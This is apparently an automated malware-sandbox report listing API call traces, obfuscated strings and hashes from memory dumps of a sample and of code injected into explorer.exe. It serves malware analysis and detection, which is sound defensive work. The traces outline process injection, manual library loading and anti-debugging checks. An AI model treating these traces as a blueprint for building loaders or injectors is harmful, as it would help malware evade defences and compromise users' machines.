LoadLibraryA.KERNEL32(?,02FE5848,00000000,00000000,75922EE0,00000000,02FE19B6,?,?,?,00000001,?,00000000), ref: 02FE1C1C
GetProcAddress.KERNEL32(00000000,-00000002), ref: 02FE1C49
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02FE1C9A

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: 731942cd19b8fe3d91e1f9d0a000fd04c696b23c1a6fb6e4e68e4e5b237761d5
Instruction ID: 14694fa0761870c7f4078aa36abeffd66f7fb53065ab9cf9366e9dd15df7d96c
Opcode Fuzzy Hash: 731942cd19b8fe3d91e1f9d0a000fd04c696b23c1a6fb6e4e68e4e5b237761d5
Instruction Fuzzy Hash: 8F317271B00615ABCF29CF2EC884BB6B7A8BF05298B04456DE95BC7640D731EC55D7A0

Function 02FE182D Relevance: 6.0, APIs: 4, Instructions: 42sleepstringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(02FE582C), ref: 02FE1839
lstrlenW.KERNEL32 ref: 02FE1845
RtlLeaveCriticalSection.NTDLL(02FE582C), ref: 02FE18A9
Sleep.KERNEL32(00007530), ref: 02FE18B4

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeaveSleeplstrlen
String ID:
API String ID: 2134730579-0
Opcode ID: 3fecd1191172f33feb0669fefb40c615abe9465e52fd28639e713cd1a950cc73
Instruction ID: 4b29257dfa17a83e6d1df8922bd8e6cc4dd9f4fe433ab44a7d88eb83181566d8
Opcode Fuzzy Hash: 3fecd1191172f33feb0669fefb40c615abe9465e52fd28639e713cd1a950cc73
Instruction Fuzzy Hash: CF018470D50115EBDF176765DD5893EBAAEEB81BC83440419F7078F240EA308E119BA2

Function 02FE26C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,02FE11DD), ref: 02FE26DB
IsWow64Process.KERNEL32(000000FF,?), ref: 02FE26ED
IsWow64Process.KERNEL32(00000000,?), ref: 02FE2700
CloseHandle.KERNEL32(00000000), ref: 02FE2716

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID:
API String ID: 331459951-0
Opcode ID: 6f76008778e5e6dc5144cf08191552d9be0be4f4f366741d5413aa6c5a1a82e3
Instruction ID: 387323a024a68a2e9f1a89714e45eab399cef764b0ec26ded4aa68530a053f6c
Opcode Fuzzy Hash: 6f76008778e5e6dc5144cf08191552d9be0be4f4f366741d5413aa6c5a1a82e3
Instruction Fuzzy Hash: 0FF09072D4221CFF9F12DFA09D498BEF7BCEE056A9B1402AAEF0197140E7304E0097A1

Function 02FE17DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON

Download Yara Rule

APIs

Part of subcall function 02FE2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02FE10BF), ref: 02FE2A0C
Part of subcall function 02FE2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02FE2A13

GetLocalTime.KERNEL32(?,00000000), ref: 02FE17F3
wsprintfW.USER32 ref: 02FE181D

Strings

[%02d.%02d.%d %02d:%02d:%02d], xrefs: 02FE1817

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID: [%02d.%02d.%d %02d:%02d:%02d]
API String ID: 377395780-613334611
Opcode ID: acce47f1e9d0cb6240adc000295e72262c125b3e21c5469838e5e090a810433e
Instruction ID: 4478478aa056bd8672d61822f6271507cbc926b315f881b1998a3d967a8f24db
Opcode Fuzzy Hash: acce47f1e9d0cb6240adc000295e72262c125b3e21c5469838e5e090a810433e
Instruction Fuzzy Hash: 9CF03062D00128BADB156BD99D098FFB3FCEF0CB52B00058AFA42E2180F6785960D3B5

Analysis Process: explorer.exePID: 1976, Parent PID: 1028COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 012B370C Relevance: 1.6, APIs: 1, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 012B378C

Memory Dump Source

Source File: 00000013.00000002.4486765739.00000000012B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 012B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12b1000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction ID: 281f48d9235d48c7e666f9f36f3df7d477f49a2c95718e8161a297c817c7683a
Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction Fuzzy Hash: FB11B27462190A4BFB5CFBB8A8EC3B537E5FB18352F54402AD915C72A1EE3985918700

Function 012BB4A8 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 012BB5A7
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 012BB651
VirtualProtect.KERNELBASE ref: 012BB66F

Memory Dump Source

Source File: 00000013.00000002.4486765739.00000000012BA000.00000040.80000000.00040000.00000000.sdmp, Offset: 012BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12ba000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction ID: 83e6e3bde1ea71b9a9d2474cde34573e1810e622d99b3bca58afecc897735865
Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction Fuzzy Hash: D851CD31774D1E4BDB24AB3CACD43F4B7D1F755361B08063AC69AC3285E658D886C382

Function 012B34C4 Relevance: 3.2, APIs: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 012B1BF8: OpenFileMappingA.KERNEL32 ref: 012B1C0F
Part of subcall function 012B1BF8: MapViewOfFile.KERNELBASE ref: 012B1C2E

SysFreeMap.PGOCR ref: 012B36F7
SleepEx.KERNELBASE ref: 012B3701

Memory Dump Source

Source File: 00000013.00000002.4486765739.00000000012B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 012B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12b1000_explorer.jbxd

Similarity

API ID: File$FreeMappingOpenSleepView
String ID:
API String ID: 4205437007-0
Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction ID: ed0efb3b74fdc6e49797b680a459deaf6c6a96be4a472b3d0df498959b70d948
Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction Fuzzy Hash: F351B730228A098FEB19FF28E8D86FA77E1FBA4350F444619D55BC32A1DF78D5058781

Function 012B1BF8 Relevance: 3.0, APIs: 2, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32 ref: 012B1C0F
MapViewOfFile.KERNELBASE ref: 012B1C2E

Memory Dump Source

Source File: 00000013.00000002.4486765739.00000000012B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 012B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12b1000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction ID: 61118cd8574c303fc466e2f05480f835824a2ce50ae2ef799d9b637f407fefd6
Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction Fuzzy Hash: E4F08234314F0D4FAB44EF7C9CDC135B7E0EBA8202700857A984AC6164EF34C4408701

Analysis Process: dghchavPID: 4036, Parent PID: 1068COMMON

Executed Functions

Function 00401840 Relevance: 35.3, APIs: 12, Strings: 8, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_lcreat.KERNEL32(00000000,00000000), ref: 00401E84
_hread.KERNEL32(00000000,00000000,00000000), ref: 00401E8D
GetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401E99
GlobalFree.KERNEL32(00000000), ref: 00401EA0
QueryDosDeviceW.KERNEL32(wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez,?,00000000), ref: 00401EB4
_free.LIBCMT ref: 00401EBB

Part of subcall function 004031CD: HeapFree.KERNEL32(00000000,00000000,?,00402C76,?,?,00401021), ref: 004031E3
Part of subcall function 004031CD: GetLastError.KERNEL32(?,?,00402C76,?,?,00401021), ref: 004031F5

Part of subcall function 0040354F: _malloc.LIBCMT ref: 0040355D

Part of subcall function 004033A0: __indefinite.LIBCMT ref: 00405060

__floor_pentium4.LIBCMT ref: 00401EDF
SetFilePointer.KERNELBASE(00000000,5D8DD343,00000000,00000000,3B09B99F,1C76D52B,1A1DACC1,7C3F92FE,660FFCA4,76D4F808,3E8EECA6,07B34857,42B591E9,43C33179,0787356F,7E982BF0), ref: 00401F02
GetTickCount.KERNEL32 ref: 00401F04
GetLastError.KERNEL32 ref: 00401F06
GetCharWidthI.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 00401F37
GetCurrentDirectoryA.KERNEL32(00000000,?), ref: 00401F82

Strings

":,x, xrefs: 004019B3
7-T=, xrefs: 00401DA9
J}s`, xrefs: 00401D5C
GxBn, xrefs: 0040184F
ls/K, xrefs: 00401AAA
K`:, xrefs: 00401ABF
O$b~, xrefs: 004018EA
wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez, xrefs: 00401EAF

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: ErrorFreeLast$CalendarCharCountCurrentDeviceDirectoryFileGlobalHeapInfoPointerQueryTickWidth__floor_pentium4__indefinite_free_hread_lcreat_malloc
String ID: ":,x$7-T=$GxBn$J}s`$K`:$O$b~$ls/K$wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez
API String ID: 796562619-3640916101
Opcode ID: 51c8ccf92fe4c139f84cf6e624a06a0f929477bf1cc2a39590fbfa169ac6ddbd
Instruction ID: 8b614c5b00c1f65204cbdd4fc9108d5837f97232f0cc16e95afeebc5dbee127e
Opcode Fuzzy Hash: 51c8ccf92fe4c139f84cf6e624a06a0f929477bf1cc2a39590fbfa169ac6ddbd
Instruction Fuzzy Hash: 0FF10EB5609380CFD2648F6AD589B8FFBE4BF85314F10891DEA999B620D7308885CF57

Non-executed Functions

Function 00401490 Relevance: 77.3, APIs: 31, Strings: 13, Instructions: 259
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004014C8
GetCharWidth32A.GDI32(00000000,00000000,00000000,00000000), ref: 004014CE
CreateDCW.GDI32(00000000,00000000,00000000,00000000), ref: 004014FF
FoldStringW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040150C
EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00401514
CreateDCW.GDI32(00000000,00000000,00000000,00000000), ref: 0040151E
CreateHardLinkA.KERNEL32(vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga,tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy,00000000), ref: 00401532
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000), ref: 0040153D
InterlockedDecrement.KERNEL32(?), ref: 00401547
_strlen.LIBCMT ref: 0040155F
LocalAlloc.KERNEL32(00000000,?), ref: 004015B2
LoadLibraryA.KERNEL32(kernel32.dll), ref: 004015C8
GetProcAddress.KERNEL32(00000000,00444BC8), ref: 00401604
GetLastError.KERNEL32(?,?,?,00000000), ref: 00401640
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00401689
GetDiskFreeSpaceExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401693
LoadLibraryA.KERNEL32(00000000), ref: 0040169B
ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 004016A9
DebugBreak.KERNEL32(?,?,?,00000000), ref: 004016AF
LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004016ED
SetEnvironmentVariableW.KERNEL32(hiramemepugatipowuzela,venogoricilagudofufoyiz), ref: 004016F9
OpenEventA.KERNEL32(00000000,00000000,00000000), ref: 00401701
GetLastError.KERNEL32 ref: 00401720
GetFileAttributesW.KERNEL32(00000000), ref: 0040176E
GetShortPathNameW.KERNEL32(dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler,?,00000000), ref: 0040177E
LocalFlags.KERNEL32(00000000), ref: 00401782
RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040178C
SetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040179A
SetComputerNameA.KERNEL32(00000000), ref: 004017A2

Strings

jjjj, xrefs: 0040168B
{, xrefs: 00401759
tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy, xrefs: 00401528
u4j, xrefs: 0040167F
Bq , xrefs: 004014D4
dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler, xrefs: 00401779
jjj, xrefs: 004016E7
venogoricilagudofufoyiz, xrefs: 004016EF
hiramemepugatipowuzela, xrefs: 004016F4
kernel32.dll, xrefs: 004015BE
vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga, xrefs: 0040152D
gulepulawoboxejobukade, xrefs: 0040154D, 00401568
, xrefs: 00401616

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: Create$ErrorFileInterlockedLastLibraryLoadLocalNameOpenString$AddressAllocAttributesBreakCharCodeCompareComputerConsoleCurrentDebugDecrementDiskEnumEnvironmentEventExceptionExchangeFlagsFoldFreeHardHttpInputLinkPagesPathProcProcessRaiseReadShortSpaceSystemTimeVariableWidth32_strlen
String ID: $Bq $dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler$gulepulawoboxejobukade$hiramemepugatipowuzela$jjj$jjjj$kernel32.dll$tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy$u4j$venogoricilagudofufoyiz$vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga${
API String ID: 3259815418-1288099099
Opcode ID: 1c7a30fab64593d96da5b7858b42650fb8546a0fed917d5484161022a4229a46
Instruction ID: 356d4041f10d2f29db6dbd7432f84ad9d0424ca7bcfc11c8b50bcae8f6dbb1b2
Opcode Fuzzy Hash: 1c7a30fab64593d96da5b7858b42650fb8546a0fed917d5484161022a4229a46
Instruction Fuzzy Hash: 5591B1B5D44214AFE710AF65ED85BAA7B78FB45709F104839F605B72E0CBB85800CBAD

Function 004010E0 Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 182
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00401180
GetNumberFormatW.KERNEL32(00000000,00000000,sogudowuwotekonex digimabawer rujusogepisalojar,00000000,?,00000000), ref: 004011DA
GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004011E5
VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004011F8
CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00401204
GetStdHandle.KERNEL32(00000000), ref: 0040120C
GetComputerNameW.KERNEL32(?,?), ref: 0040121D
ClearCommBreak.KERNEL32(00000000), ref: 00401225
InterlockedDecrement.KERNEL32(?), ref: 0040122F
EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040123D
GetTempPathA.KERNEL32(00000000,?), ref: 00401248
_memset.LIBCMT ref: 0040125D
CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 0040126D
GetVersionExW.KERNEL32(?), ref: 0040127A
CreateActCtxA.KERNEL32(?), ref: 00401287
InterlockedIncrement.KERNEL32(?), ref: 00401291
GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 004012A2
EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004012B0
GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000000), ref: 004012BF
SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 004012D8
GlobalWire.KERNEL32(00000000), ref: 004012E0
CreateEventW.KERNEL32(00000000,00000000,00000000,yoyorohexumutuwasetebayuda), ref: 0040131D

Strings

sogudowuwotekonex digimabawer rujusogepisalojar, xrefs: 004011D1
, xrefs: 00401142
yoyorohexumutuwasetebayuda, xrefs: 00401312

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: Info$CalendarCommCreateEnumFileInterlockedNamePathVersion$AttributesBreakClearComputerConfigCopyDecrementDialogDriveEventFormatGlobalHandleIncrementLocaleLogicalMountNumberPointShortStringsTempVerifyVolumeWire_memset
String ID: $sogudowuwotekonex digimabawer rujusogepisalojar$yoyorohexumutuwasetebayuda
API String ID: 4125211919-822714830
Opcode ID: cad9de049f8f27f91a41107709eabf3daf181dbbc58ac01bfadc70c1cc3b8694
Instruction ID: a822d109fb70ae75058a0a4b7bb429345da21f1934e5888e6a3cea804fba91e2
Opcode Fuzzy Hash: cad9de049f8f27f91a41107709eabf3daf181dbbc58ac01bfadc70c1cc3b8694
Instruction Fuzzy Hash: E3716A75E40219AFEB10DFA5DD49B9EB7B4FB48701F108469E608BB2D0C7B46A40CF69

Function 00401360 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 98
pipetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004013BF
CreateJobObjectW.KERNEL32(00000000,zamuloguwatisofobus), ref: 004013C8
GetConsoleAliasExesA.KERNEL32(?,00000000), ref: 004013D3
EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 004013DF
CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004013F5
SetFileShortNameW.KERNEL32(00000000,00000000), ref: 004013FF
SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 00401409
GetTimeFormatA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040141B
GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 00401427
TlsSetValue.KERNEL32(00000000,00000000), ref: 0040142D
SetVolumeMountPointW.KERNEL32(00000000,?), ref: 0040143C
GetEnvironmentVariableA.KERNEL32(00000000,?,00000000), ref: 0040144D
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,gotarurivocabowixetalakagaxahufijefisosefimazuwuhituwigoveyehucorocoyepep), ref: 0040145E
GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040146F

Strings

zamuloguwatisofobus, xrefs: 004013C1
gotarurivocabowixetalakagaxahufijefisosefimazuwuhituwigoveyehucorocoyepep, xrefs: 00401453

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: FileName$CreateFormatModule$AliasCalendarConsoleDateEnumEnvironmentExesFormatsInfoMountNamedNumberObjectParametersPipePointProcessShortShutdownTimeValueVariableVolume
String ID: gotarurivocabowixetalakagaxahufijefisosefimazuwuhituwigoveyehucorocoyepep$zamuloguwatisofobus
API String ID: 3743761972-355902816
Opcode ID: 3128c6d63ce5f64c3af40b3ea0140d5989af5d9dddbbdd0500db31e5f157e556
Instruction ID: 85a714800d049f8b42b38d3012af1d189035c7edfbcc51f85ffd02250f5699ef
Opcode Fuzzy Hash: 3128c6d63ce5f64c3af40b3ea0140d5989af5d9dddbbdd0500db31e5f157e556
Instruction Fuzzy Hash: ED318D76784314BBF7109BA2AD4AF997764EB08B02F104465F708BA1D0CAF06950CB79

Function 00403FC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 004078F7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040790C
UnhandledExceptionFilter.KERNEL32((HD), ref: 00407917
GetCurrentProcess.KERNEL32(C0000409), ref: 00407933
TerminateProcess.KERNEL32(00000000), ref: 0040793A

Strings

(HD, xrefs: 00407912

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: (HD
API String ID: 2579439406-2148437710
Opcode ID: 0cca4cb3f6c34e2bac765e9ca107058cf167fc74ec1c3ba3081b062c0abda26a
Instruction ID: 7c49ad6c5058463ad118c416b144a0f7b5f21ff1462cb7ffb68cc8e8a676fc82
Opcode Fuzzy Hash: 0cca4cb3f6c34e2bac765e9ca107058cf167fc74ec1c3ba3081b062c0abda26a
Instruction Fuzzy Hash: E321EFBC802204DBD700EF66FD897167BE0BB8A315F11143AE908A73A1EB745981AB4D

Function 0040635C Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000631A), ref: 00406361

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eac57621da90cc809f0097ce8559889bf2519d77c8f79c97426d879ceac02f12
Instruction ID: 646d0ba3557a20301b4c37877e7552472355a53ce9fee5a1e0a4ed321b8263d8
Opcode Fuzzy Hash: eac57621da90cc809f0097ce8559889bf2519d77c8f79c97426d879ceac02f12
Instruction Fuzzy Hash: 1A900270252104C6CA101B719D0D50625906A8C60B7520C71A402EC094DA7444205959

Function 00405DD6 Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00403A6B), ref: 00405DDE
__mtterm.LIBCMT ref: 00405DEA

Part of subcall function 00405B23: DecodePointer.KERNEL32(00000004,00405F4C,?,00403A6B), ref: 00405B34
Part of subcall function 00405B23: TlsFree.KERNEL32(00000003,00405F4C,?,00403A6B), ref: 00405B4E

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00405E00
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00405E0D
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00405E1A
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00405E27
TlsAlloc.KERNEL32(?,00403A6B), ref: 00405E77
TlsSetValue.KERNEL32(00000000,?,00403A6B), ref: 00405E92
__init_pointers.LIBCMT ref: 00405E9C
EncodePointer.KERNEL32(?,00403A6B), ref: 00405EAD
EncodePointer.KERNEL32(?,00403A6B), ref: 00405EBA
EncodePointer.KERNEL32(?,00403A6B), ref: 00405EC7
EncodePointer.KERNEL32(?,00403A6B), ref: 00405ED4
DecodePointer.KERNEL32(00405CA7,?,00403A6B), ref: 00405EF5
__calloc_crt.LIBCMT ref: 00405F0A
DecodePointer.KERNEL32(00000000,?,00403A6B), ref: 00405F24
__initptd.LIBCMT ref: 00405F2F
GetCurrentThreadId.KERNEL32 ref: 00405F36

Strings

FlsFree, xrefs: 00405E1C
FlsAlloc, xrefs: 00405DFA
FlsSetValue, xrefs: 00405E0F
KERNEL32.DLL, xrefs: 00405DD9
PNv, xrefs: 00405EE4
FlsGetValue, xrefs: 00405E02

Memory Dump Source

